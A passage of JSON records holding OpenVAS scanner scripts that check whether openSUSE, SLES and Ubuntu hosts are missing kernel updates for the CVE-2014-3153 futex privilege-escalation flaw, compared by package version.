{"lastseen": "2020-01-31T18:39:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2014-07-15T00:00:00", "id": "OPENVAS:1361412562310850595", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850595", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2014:0878-1)", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850595\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-07-15 16:38:28 +0530 (Tue, 15 Jul 2014)\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2014:0878-1)\");\n\n script_tag(name:\"affected\", value:\"kernel on openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"kernel update for Evergreen 11.4 fixes local privilege escalation in futex\n code (bnc#880892 / CVE-2014-3153) and a regression causing a crash if\n IPsec peer is unavailable\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0878-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSE11\\.4\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-hmac\", rpm:\"kernel-debug-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.0.101~87.1\", 
rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-hmac\", rpm:\"kernel-default-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-devel-debuginfo\", rpm:\"kernel-desktop-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-desktop-hmac\", rpm:\"kernel-desktop-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", 
rpm:\"kernel-ec2~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel-debuginfo\", rpm:\"kernel-ec2-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-extra\", rpm:\"kernel-ec2-extra~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-extra-debuginfo\", rpm:\"kernel-ec2-extra-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-hmac\", rpm:\"kernel-ec2-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n 
}\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel-debuginfo\", rpm:\"kernel-trace-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-hmac\", rpm:\"kernel-trace-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base\", rpm:\"kernel-vanilla-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-base-debuginfo\", rpm:\"kernel-vanilla-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n 
report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-devel-debuginfo\", rpm:\"kernel-vanilla-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vanilla-hmac\", rpm:\"kernel-vanilla-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-hmac\", rpm:\"kernel-xen-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload\", rpm:\"preload~1.2~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-debuginfo\", rpm:\"preload-debuginfo~1.2~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-debugsource\", rpm:\"preload-debugsource~1.2~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-kmp-default\", 
rpm:\"preload-kmp-default~1.2_3.0.101_87~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-kmp-default-debuginfo\", rpm:\"preload-kmp-default-debuginfo~1.2_3.0.101_87~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-kmp-desktop\", rpm:\"preload-kmp-desktop~1.2_3.0.101_87~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"preload-kmp-desktop-debuginfo\", rpm:\"preload-kmp-desktop-debuginfo~1.2_3.0.101_87~6.65.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.0.101~87.2\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-pae-hmac\", rpm:\"kernel-pae-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi\", 
rpm:\"kernel-vmi~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-base\", rpm:\"kernel-vmi-base~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-base-debuginfo\", rpm:\"kernel-vmi-base-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-debuginfo\", rpm:\"kernel-vmi-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-debugsource\", rpm:\"kernel-vmi-debugsource~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-devel\", rpm:\"kernel-vmi-devel~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-devel-debuginfo\", rpm:\"kernel-vmi-devel-debuginfo~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-vmi-hmac\", rpm:\"kernel-vmi-hmac~3.0.101~87.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851102", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851102", "type": "openvas", "title": "SUSE: Security Advisory for Linux (SUSE-SU-2014:0837-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This 
program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851102\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 20:04:21 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-3153\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for Linux (SUSE-SU-2014:0837-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Linux'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SUSE Linux Enterprise 11 Service Pack 2 LTSS kernel was updated to fix\n a critical security issue:\n\n * CVE-2014-3153: The futex acquisition code in kernel/futex.c can be\n used to gain ring0 access via the futex syscall. This could be used\n for privilege escalation by non-root users. 
(bnc#880892)\n\n Security Issue reference:\n\n * CVE-2014-3153\n Indications:\n\n Everyone using the Linux Kernel on x86_64 architecture should update.\n\n Special Instructions and Notes:\n\n Please reboot the system after installing this update.\");\n\n script_tag(name:\"affected\", value:\"Linux on SUSE Linux Enterprise Server 11 SP2 LTSS\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0837-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP2\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-source\", 
rpm:\"kernel-source~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.0.101~0.7.21.1\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-default\", rpm:\"xen-kmp-default~4.1.6_06_3.0.101_0.7.21~0.5.16\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"xen-kmp-trace\", rpm:\"xen-kmp-trace~4.1.6_06_3.0.101_0.7.21~0.5.16\", rls:\"SLES11.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153", "CVE-2013-4483"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-06-09T00:00:00", "id": "OPENVAS:1361412562310841849", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841849", "type": "openvas", "title": "Ubuntu Update for 
linux-lts-raring USN-2238-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2238_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-raring USN-2238-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841849\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-09 15:08:11 +0530 (Mon, 09 Jun 2014)\");\n script_cve_id(\"CVE-2014-3153\", \"CVE-2013-4483\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-raring USN-2238-1\");\n\n script_tag(name:\"affected\", value:\"linux-lts-raring on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Pinkie Pie discovered a flaw in the Linux kernel's futex\nsubsystem. 
An unprivileged local user could exploit this flaw to cause a denial\nof service (system crash) or gain administrative privileges. (CVE-2014-3153)\n\nA flaw was discovered in the Linux kernel's IPC reference counting. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (OOM system crash). (CVE-2013-4483)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2238-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2238-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-raring'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.8.0-42-generic\", ver:\"3.8.0-42.62~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n 